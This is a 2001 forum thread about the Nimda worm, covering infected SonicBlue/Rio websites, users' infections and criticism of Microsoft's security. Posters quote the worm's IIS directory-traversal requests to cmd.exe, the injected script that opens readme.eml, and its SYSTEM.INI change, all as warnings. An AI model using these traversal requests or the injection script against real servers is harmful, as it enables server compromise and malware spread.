We've just noticed that if you connect to www.sonicblue.com or www.riohome.com a file download (which may or may not be a virus) opens. It will extract and save a file called readme.exe - I suggest that you do not accept this file, and that you definitely do not execute it.

Our UK sysadmin people are waking up the US guys as I type, so this should get fixed soon.

Rob

This is part of a larger IIS and IE problem (from slashdot) :

A new worm seems to be running rampant Unlike Code Red, it attempts to hit boxes with many different exploits (including what looks like an attempt to exploit boxes still rooted by Code Red). It looks like each IP tries 16 attempts on its neighbors. There is also a new mail worm mailing WAV files or something with bits of what appears to be the registry... it may or may not be related. Got any words on this? Shut down those windows boxes and stop opening attachments. And make that 21. Got another one while writing this story. All my hits are coming from 208.n.n.n (where I am) I'm sure it'll keep moving to nearby boxes.

Here are examples of the requests it's sending:


GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../
..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
While writing this story I was hit a total of 4 times, 16 GET attempts per attack. In only 4 minutes. Also of interest, My desktop has now been hit about 500 times today, all from 208.x.x.x IPs. This might be really bad. I still haven't read anything about this anywhere else, so you heard it here first ;)

Update Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!

Here is a URL.

Paul.

Paul Haigh, Reg. 4120
(mk1) 6GB, Blue, 00254
(mk2) 12GB, Red, 00357

Tell us how you really feel about Microsoft products.
I don't think it's as bad as you make it sound.
Here's symantec's explanation. W32.Nimda.A@mm

I don't think it's as bad as you make it sound.

Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!

Hmm, due to bugs in two different MS products, this worm is running amok. And you don't see anything wrong here?

I'm watching it nail both my home firewall machine, and machines here at work. It's not fun. And realisticially, the only way to stop is is to shut down the world wide web. Everyone back to gopher...

I'm running IE 5.00 SP2 and it is not automatically running the executable.

Rob

Arguably, MS has the largest install base and very complex code.
That lends itself to exploit. Let's not pretend that other OSes don't have vulnerabilities.
How many Unix boxes out there still have the sendmail exploit available and thats a decade old.
It's all about the Sysadmin.

I've seen both IE 4 and 5.5 run that e-mail attachment automaticially here. It's a mess here at my company right now. I'm still wondering when the IT guys are going to notice and shut down port 80 again, except to verified worm free servers again.

Usually when I have seen it, IE pops open a new window on the taskbar, with the text mshtml:// or something similar to that. I believe it depends on how your system accepts .eml files.

Update:
I just grabbed this from the bottom of a page here that is infected:
< html >< script language="JavaScript" >window.open("readme.eml", null, "resizable=no,top=6000,left=6000")< /script >< /html >

Edited by Drakino on 18/09/01 07:35 PM.

Arguably, MS has the largest install base and very complex code.
That lends itself to exploit. Let's not pretend that other OSes don't have vulnerabilities.
How many Unix boxes out there still have the sendmail exploit available and thats a decade old.
It's all about the Sysadmin.

Agreed to some point. Apache actually still leads the web server market, although IIS is gaining quite a bit of ground.

As far as "It's all about the sysadmin", yes it is. I'm just always amazed at how many new MS exploits appear, and how long it takes for a fix to be released. Then you have the issue that almost no MS admin, not even the MCSEs know about hotfixes.

If Microsoft wants the desktop market, they need to have child-proof security built in. Expecting a home user to be a sysadmin is not the right thing. Lets bring up the car analogy. How many people out there only know how to drive their cars, and not repair them? Quite a few. But that industry knows that, so they provide easy instructions for common things, like filling the tank, or changing the wiper blades. Compare that to Microsoft, who only shows off their products "new and improved" features, instead of teaching them they need to click on "Windows Update" every once in a while. They are getting better, but more work is needed if we want to keep the internet in a useable form down the road.

If the fix from Microsoft, issued back in Oct. 2000 was installed, would servers be infected? We got hit here at work, and I curious as to whether the damage was avoidable....

We use these computers for broadcasting... imagine a dozen live tv studios taking a dump because of this....

basically, our NT boxes would eventually do a physical memory dump and reboot. After rebooting, the system would look for Outlook to email the virus. But, we were smart enuff to not install Outlook on these workstations.... still a mess.

32GB Mk. II in a WRX
Detroit, MI USA
www.PfeifferBeer.com

If the fix from Microsoft, issued back in Oct. 2000 was installed, would servers be infected?

I get the impression that it works like this:

- If you're running IIS, and the server hasn't been patched, the server can be infected from the web.

- If you're not running IIS, but someone on your internal network connects to an infected server, they might spread it on your internal network if they execute the file the server offers them.

- The virus can also be spread via e-mail executables.

Although the details at the web sites are still sketchy, I have just issued this message to my LAN users:

In reply to:

---

More information on the new worm has been posted at the Network Associates (McAffe) site:

http://vil.nai.com/vil/virusSummary.asp?virus_k=99209

One of the things that the virus apparently does is to alter your SYSTEM.INI file. The line:

Shell=explorer.exe

Gets changed to

Shell=explorer.exe load.exe -dontrunold

If your machine appears to be behaving strangely or slowly, please check your system.ini file. If you find this alteration, please let me know so that I can gauge if there is any possible threat to our internal network.

Note that the Shell= line might not exist on some NT/2K systems. This is OK. It's only the altered version that indicates the presence of the virus.

---

___________
Tony Fabris

Could someone tell me what this virus does? I'm very curious because all of a sudden I appear to be having a problem with my image files. it seems they've been renamed like this: pic1.jpg.vbs

When I remove the .vbs extention the file is unreadable by PSP. It also appears that some of my MP3s are affected but not all.

What's going on!?!? I'm freaking out here!

DiGNAN
Ob-La-Di, Ob-La-Da, etc.

I'm sorry, it seems that this might be a different virus. I recieved it via an email attachment, but this one was called LIROTOPE.GIF.vbs, not readme.txt as many warnings are saying. I stupidly opened it. Is there anything I can do?? has anyone heard of this one?

DiGNAN
Ob-La-Di, Ob-La-Da, etc.

That sounds like the behavior of a pretty old virus that's reasonably well known.

You can run a piece of virus scanning software that will also clean the system for you.

I am partial to McAfee VirusScan (recently purchased by Network Associates), which can be purchased at www.nai.com. However, just about any virus scanner can clean that one for you.

___________
Tony Fabris

Phew, thanks. I was worried, what with this new virus talk.

Hehe, and thanks for being on at 2AM . although I guess for you it's what, 11?

DiGNAN
Ob-La-Di, Ob-La-Da, etc.

Just to give people an idea of the seriousness of the past few worms, I offer this bit from my home security report on it:

31730 total attacks, 3015 unique hosts
169 CodeRed Version 1 attacks
6920 CodeRed Version 2 attacks
0 CodeRed Version Unknown attacks
24641 Nimda attacks (Roughly 1449 every hour, or 24 a minute)

all on one little IP...

Here is the part that is bothersome. www.sonicblue.com and www.riohome.com are still down. These websites were left unpatched to security holes that have been known for months.

For all we know all users who recently purchases tuners could have had their credit card numbers stolen.

It goes without saying that this is of no fault to the Empeg folks.

-Kit

For all we know all users who recently purchased tuners could have had their credit card numbers stolen.

Unlikely, as those were handled through Digital River, not through SonicBlue.

In any case, it's rare for a web server to be the same machine as the one that stores the financial transaction data, so even if a web server is compromised, it doesn't necessarily mean any user data was compromised.

That's not to say that this sort of thing hasn't ever happened. Doug Burnside can testify that it has, indeed happened to some companies in the past.

___________
Tony Fabris

The hosting of both of these sites is contracted out (to a very major hosting company - you can work out who quite easily). The sites have been taken down while the files are fixed up and servers get patched.

Needless to say, nobody is happy with the situation.

As Tony said, the store is contracted out to Digital River who do not appear to have been affected. store.sonicblue.com is still online.

Rob

Is it pretty safe to assume that any file with a "double" file extension is a warning sign? I have received a few in the past, but the filename.xxx.exe or filename.xxx.doc was always a tip off to me....

Went in to work today, and we are completely cripled... I spent the day helping our support person install new drives... all of our network connections, even LAN have been disabled until we narrow this down.

32GB Mk. II in a WRX
Detroit, MI USA
www.PfeifferBeer.com

Is it pretty safe to assume that any file with a "double" file extension is a warning sign?

Yes, for the most part. Especially if the second extension is an executable of some kind (.vbs is most common).

Of course, as far as I'm concerned, the presence of Outlook on the hard disk is a warning sign...

___________
Tony Fabris

Of course, as far as I'm concerned, the presence of Outlook on the hard disk is a warning sign...

Very true. I've always used Eudora and as such have always been spared, since practically all viruses nowadays are coded to work with outlook and only outlook.
I don't mind

Here at work, we specifically don't have Outlook installed and use Lotus Notes instead. We were still hit. It took longer to spread, but it still did.

32GB Mk. II in a WRX
Detroit, MI USA
www.PfeifferBeer.com